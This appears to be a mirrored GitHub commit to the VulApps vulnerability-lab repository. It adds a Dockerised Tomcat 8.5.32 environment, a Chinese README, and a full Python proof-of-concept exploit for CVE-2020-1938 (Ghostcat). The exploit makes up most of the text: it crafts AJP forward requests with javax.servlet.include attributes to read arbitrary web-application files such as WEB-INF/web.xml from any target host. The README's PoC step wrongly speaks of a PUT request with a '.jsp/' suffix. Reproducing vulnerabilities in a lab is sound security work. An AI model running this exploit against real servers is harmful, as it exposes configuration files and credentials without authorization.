mirror of
https://github.com/Medicean/VulApps.git
synced 2025-05-05 10:17:40 +00:00
Merge pull request #32 from jwxa2015/CVE-2020-1938
添加 Tomcat Apache Tomcat 文件包含漏洞(CVE-2020-1938)
This commit is contained in:
Medicean
GitHub
commit
d385775f42
3
t/tomcat/2/Dockerfile
Normal file
3
t/tomcat/2/Dockerfile
Normal file
@ -0,0 +1,3 @@
|
||||
FROM tomcat:8.5.32
|
||||
|
||||
EXPOSE 8080
|
||||
39
t/tomcat/2/README.md
Normal file
39
t/tomcat/2/README.md
Normal file
@ -0,0 +1,39 @@
|
||||
## Tomcat Apache Tomcat 文件包含漏洞(CVE-2020-1938)
|
||||
|
||||
### 漏洞信息
|
||||
|
||||
* [Fixed in Apache Tomcat 8.5.51](https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.51)
|
||||
* [【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)](http://blog.nsfocus.net/cve-2020-1938/)
|
||||
|
||||
### 获取环境:
|
||||
|
||||
1. 拉取镜像到本地
|
||||
|
||||
```
|
||||
$ docker pull medicean/vulapps:t_tomcat_2
|
||||
```
|
||||
|
||||
2. 启动环境
|
||||
|
||||
```
|
||||
$ docker run -d -p 8080:8080 medicean/vulapps:t_tomcat_2
|
||||
```
|
||||
> `-p 8080:8080` 前面的 8080 代表物理机的端口,可随意指定。
|
||||
|
||||
### 使用与利用
|
||||
|
||||
访问 `http://你的 IP 地址:端口号/`
|
||||
|
||||
#### PoC
|
||||
|
||||
1. 向目标发起 PUT 请求,注意后缀为 `.jsp/`
|
||||
|
||||
```
|
||||
python poc.py 127.0.0.1 -p 8009 -f WEB-INF/web.xml
|
||||
```
|
||||
|
||||
> POC来源:[https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi)
|
||||
### 参考链接
|
||||
|
||||
* [Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞复现(含有poc)](https://www.cnblogs.com/L0ading/p/12341112.html)
|
||||
* [Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞复现](https://www.liuyixiang.com/post/109123.html)
|
||||
302
t/tomcat/2/poc.py
Normal file
302
t/tomcat/2/poc.py
Normal file
@ -0,0 +1,302 @@
|
||||
#!/usr/bin/env python
|
||||
#CNVD-2020-10487 Tomcat-Ajp lfi
|
||||
#by ydhcui
|
||||
import struct
|
||||
|
||||
# Some references:
|
||||
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
|
||||
def pack_string(s):
|
||||
if s is None:
|
||||
return struct.pack(">h", -1)
|
||||
l = len(s)
|
||||
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
|
||||
def unpack(stream, fmt):
|
||||
size = struct.calcsize(fmt)
|
||||
buf = stream.read(size)
|
||||
return struct.unpack(fmt, buf)
|
||||
def unpack_string(stream):
|
||||
size, = unpack(stream, ">h")
|
||||
if size == -1: # null string
|
||||
return None
|
||||
res, = unpack(stream, "%ds" % size)
|
||||
stream.read(1) # \0
|
||||
return res
|
||||
class NotFoundException(Exception):
|
||||
pass
|
||||
class AjpBodyRequest(object):
|
||||
# server == web server, container == servlet
|
||||
SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
|
||||
MAX_REQUEST_LENGTH = 8186
|
||||
def __init__(self, data_stream, data_len, data_direction=None):
|
||||
self.data_stream = data_stream
|
||||
self.data_len = data_len
|
||||
self.data_direction = data_direction
|
||||
def serialize(self):
|
||||
data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
|
||||
if len(data) == 0:
|
||||
return struct.pack(">bbH", 0x12, 0x34, 0x00)
|
||||
else:
|
||||
res = struct.pack(">H", len(data))
|
||||
res += data
|
||||
if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
|
||||
header = struct.pack(">bbH", 0x12, 0x34, len(res))
|
||||
else:
|
||||
header = struct.pack(">bbH", 0x41, 0x42, len(res))
|
||||
return header + res
|
||||
def send_and_receive(self, socket, stream):
|
||||
while True:
|
||||
data = self.serialize()
|
||||
socket.send(data)
|
||||
r = AjpResponse.receive(stream)
|
||||
while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
|
||||
r = AjpResponse.receive(stream)
|
||||
|
||||
if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
|
||||
break
|
||||
class AjpForwardRequest(object):
|
||||
_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
|
||||
REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
|
||||
# server == web server, container == servlet
|
||||
SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
|
||||
COMMON_HEADERS = ["SC_REQ_ACCEPT",
|
||||
"SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION",
|
||||
"SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2",
|
||||
"SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
|
||||
]
|
||||
ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
|
||||
def __init__(self, data_direction=None):
|
||||
self.prefix_code = 0x02
|
||||
self.method = None
|
||||
self.protocol = None
|
||||
self.req_uri = None
|
||||
self.remote_addr = None
|
||||
self.remote_host = None
|
||||
self.server_name = None
|
||||
self.server_port = None
|
||||
self.is_ssl = None
|
||||
self.num_headers = None
|
||||
self.request_headers = None
|
||||
self.attributes = None
|
||||
self.data_direction = data_direction
|
||||
def pack_headers(self):
|
||||
self.num_headers = len(self.request_headers)
|
||||
res = ""
|
||||
res = struct.pack(">h", self.num_headers)
|
||||
for h_name in self.request_headers:
|
||||
if h_name.startswith("SC_REQ"):
|
||||
code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
|
||||
res += struct.pack("BB", 0xA0, code)
|
||||
else:
|
||||
res += pack_string(h_name)
|
||||
|
||||
res += pack_string(self.request_headers[h_name])
|
||||
return res
|
||||
|
||||
def pack_attributes(self):
|
||||
res = b""
|
||||
for attr in self.attributes:
|
||||
a_name = attr['name']
|
||||
code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
|
||||
res += struct.pack("b", code)
|
||||
if a_name == "req_attribute":
|
||||
aa_name, a_value = attr['value']
|
||||
res += pack_string(aa_name)
|
||||
res += pack_string(a_value)
|
||||
else:
|
||||
res += pack_string(attr['value'])
|
||||
res += struct.pack("B", 0xFF)
|
||||
return res
|
||||
def serialize(self):
|
||||
res = ""
|
||||
res = struct.pack("bb", self.prefix_code, self.method)
|
||||
res += pack_string(self.protocol)
|
||||
res += pack_string(self.req_uri)
|
||||
res += pack_string(self.remote_addr)
|
||||
res += pack_string(self.remote_host)
|
||||
res += pack_string(self.server_name)
|
||||
res += struct.pack(">h", self.server_port)
|
||||
res += struct.pack("?", self.is_ssl)
|
||||
res += self.pack_headers()
|
||||
res += self.pack_attributes()
|
||||
if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
|
||||
header = struct.pack(">bbh", 0x12, 0x34, len(res))
|
||||
else:
|
||||
header = struct.pack(">bbh", 0x41, 0x42, len(res))
|
||||
return header + res
|
||||
def parse(self, raw_packet):
|
||||
stream = StringIO(raw_packet)
|
||||
self.magic1, self.magic2, data_len = unpack(stream, "bbH")
|
||||
self.prefix_code, self.method = unpack(stream, "bb")
|
||||
self.protocol = unpack_string(stream)
|
||||
self.req_uri = unpack_string(stream)
|
||||
self.remote_addr = unpack_string(stream)
|
||||
self.remote_host = unpack_string(stream)
|
||||
self.server_name = unpack_string(stream)
|
||||
self.server_port = unpack(stream, ">h")
|
||||
self.is_ssl = unpack(stream, "?")
|
||||
self.num_headers, = unpack(stream, ">H")
|
||||
self.request_headers = {}
|
||||
for i in range(self.num_headers):
|
||||
code, = unpack(stream, ">H")
|
||||
if code > 0xA000:
|
||||
h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
|
||||
else:
|
||||
h_name = unpack(stream, "%ds" % code)
|
||||
stream.read(1) # \0
|
||||
h_value = unpack_string(stream)
|
||||
self.request_headers[h_name] = h_value
|
||||
def send_and_receive(self, socket, stream, save_cookies=False):
|
||||
res = []
|
||||
i = socket.sendall(self.serialize())
|
||||
if self.method == AjpForwardRequest.POST:
|
||||
return res
|
||||
|
||||
r = AjpResponse.receive(stream)
|
||||
assert r.prefix_code == AjpResponse.SEND_HEADERS
|
||||
res.append(r)
|
||||
if save_cookies and 'Set-Cookie' in r.response_headers:
|
||||
self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
|
||||
|
||||
# read body chunks and end response packets
|
||||
while True:
|
||||
r = AjpResponse.receive(stream)
|
||||
res.append(r)
|
||||
if r.prefix_code == AjpResponse.END_RESPONSE:
|
||||
break
|
||||
elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
|
||||
continue
|
||||
else:
|
||||
raise NotImplementedError
|
||||
break
|
||||
|
||||
return res
|
||||
|
||||
class AjpResponse(object):
|
||||
_,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
|
||||
COMMON_SEND_HEADERS = [
|
||||
"Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
|
||||
"Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
|
||||
]
|
||||
def parse(self, stream):
|
||||
# read headers
|
||||
self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
|
||||
|
||||
if self.prefix_code == AjpResponse.SEND_HEADERS:
|
||||
self.parse_send_headers(stream)
|
||||
elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
|
||||
self.parse_send_body_chunk(stream)
|
||||
elif self.prefix_code == AjpResponse.END_RESPONSE:
|
||||
self.parse_end_response(stream)
|
||||
elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
|
||||
self.parse_get_body_chunk(stream)
|
||||
else:
|
||||
raise NotImplementedError
|
||||
|
||||
def parse_send_headers(self, stream):
|
||||
self.http_status_code, = unpack(stream, ">H")
|
||||
self.http_status_msg = unpack_string(stream)
|
||||
self.num_headers, = unpack(stream, ">H")
|
||||
self.response_headers = {}
|
||||
for i in range(self.num_headers):
|
||||
code, = unpack(stream, ">H")
|
||||
if code <= 0xA000: # custom header
|
||||
h_name, = unpack(stream, "%ds" % code)
|
||||
stream.read(1) # \0
|
||||
h_value = unpack_string(stream)
|
||||
else:
|
||||
h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001]
|
||||
h_value = unpack_string(stream)
|
||||
self.response_headers[h_name] = h_value
|
||||
|
||||
def parse_send_body_chunk(self, stream):
|
||||
self.data_length, = unpack(stream, ">H")
|
||||
self.data = stream.read(self.data_length+1)
|
||||
|
||||
def parse_end_response(self, stream):
|
||||
self.reuse, = unpack(stream, "b")
|
||||
|
||||
def parse_get_body_chunk(self, stream):
|
||||
rlen, = unpack(stream, ">H")
|
||||
return rlen
|
||||
|
||||
@staticmethod
|
||||
def receive(stream):
|
||||
r = AjpResponse()
|
||||
r.parse(stream)
|
||||
return r
|
||||
|
||||
import socket
|
||||
|
||||
def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
|
||||
fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
|
||||
fr.method = method
|
||||
fr.protocol = "HTTP/1.1"
|
||||
fr.req_uri = req_uri
|
||||
fr.remote_addr = target_host
|
||||
fr.remote_host = None
|
||||
fr.server_name = target_host
|
||||
fr.server_port = 80
|
||||
fr.request_headers = {
|
||||
'SC_REQ_ACCEPT': 'text/html',
|
||||
'SC_REQ_CONNECTION': 'keep-alive',
|
||||
'SC_REQ_CONTENT_LENGTH': '0',
|
||||
'SC_REQ_HOST': target_host,
|
||||
'SC_REQ_USER_AGENT': 'Mozilla',
|
||||
'Accept-Encoding': 'gzip, deflate, sdch',
|
||||
'Accept-Language': 'en-US,en;q=0.5',
|
||||
'Upgrade-Insecure-Requests': '1',
|
||||
'Cache-Control': 'max-age=0'
|
||||
}
|
||||
fr.is_ssl = False
|
||||
fr.attributes = []
|
||||
return fr
|
||||
|
||||
class Tomcat(object):
|
||||
def __init__(self, target_host, target_port):
|
||||
self.target_host = target_host
|
||||
self.target_port = target_port
|
||||
|
||||
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
self.socket.connect((target_host, target_port))
|
||||
self.stream = self.socket.makefile("rb", bufsize=0)
|
||||
|
||||
def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
|
||||
self.req_uri = req_uri
|
||||
self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
|
||||
print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
|
||||
if user is not None and password is not None:
|
||||
self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
|
||||
for h in headers:
|
||||
self.forward_request.request_headers[h] = headers[h]
|
||||
for a in attributes:
|
||||
self.forward_request.attributes.append(a)
|
||||
responses = self.forward_request.send_and_receive(self.socket, self.stream)
|
||||
if len(responses) == 0:
|
||||
return None, None
|
||||
snd_hdrs_res = responses[0]
|
||||
data_res = responses[1:-1]
|
||||
if len(data_res) == 0:
|
||||
print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
|
||||
return snd_hdrs_res, data_res
|
||||
|
||||
'''
|
||||
javax.servlet.include.request_uri
|
||||
javax.servlet.include.path_info
|
||||
javax.servlet.include.servlet_path
|
||||
'''
|
||||
|
||||
import argparse
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("target", type=str, help="Hostname or IP to attack")
|
||||
parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
|
||||
parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
|
||||
args = parser.parse_args()
|
||||
t = Tomcat(args.target, args.port)
|
||||
_,data = t.perform_request('/asdf',attributes=[
|
||||
{'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
|
||||
{'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]},
|
||||
{'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
|
||||
])
|
||||
print('----------------------------')
|
||||
print("".join([d.data for d in data]))
|
||||
@ -2,3 +2,4 @@ Tomcat
|
||||
---
|
||||
|
||||
* [Tomcat 远程代码执行漏洞 (CVE-2017-12615)](./1/)
|
||||
* [Tomcat Apache Tomcat 文件包含漏洞(CVE-2020-1938)](./2/)
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user